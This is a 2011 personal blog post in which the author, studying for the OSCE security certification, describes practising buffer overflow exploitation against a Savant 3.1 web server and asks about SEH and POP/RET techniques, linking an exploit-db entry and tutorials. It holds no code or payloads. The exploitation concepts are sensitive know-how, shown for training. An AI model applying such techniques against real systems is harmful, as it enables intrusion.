Monday, May 30, 2011

Buffer Overflows

It has been a while since I posted anything.   It has been a busy time.  I have been able to sneak in some time to work on my OffSec skills.  Hey I am working on it.  Anyway, to prepare for the OSCE course, I am looking through the 'www.exploit-db.com' site and trying to re-exploit applications that are available using python.  I like python a lot and trying to get better at it currently so it looked like the obvious choice.  I am running into some confusion on the Savant 3.1 Web Server.  I understand that when exploiting SEH, we are looking for a POP, POP, return.  I understand that when you have a stack exploit, you look for a JMP into a CPU register.  But somehow, I am getting lost on the POP, RET.  Is it just the same logic behind SEH?  Are we just popping the last entry in the stack and putting the last memory entry in EIP? I have reviewed the exploit code from "http://www.exploit-db.com/exploits/10434/".  Also, there is a great tutorial for EggHunters and Buffer Overflows at "http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html".  Just a side note, this blog has helped me in the past understand SEH exploits along with the site "https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/".   That site is incredible too.  If you want to know about buffer overflows, these are the sites to go to.  Anyway, I am kind of stuck right now, but the irony is that the person who found the vulnerability to Savant is Muts, teacher and founder of OffSec of OSCP and OSCE courses.  I know I have a lot of learning in store for me with the OSCE.  Hopefully, I can get some more headway with this.  On a more depressing note, I am sure I cannot afford any big CONs this year like I planned if I want to get the OSCE course and move by next year.  But the good news, I am sure there will be great CONs then too.

No comments:

Post a Comment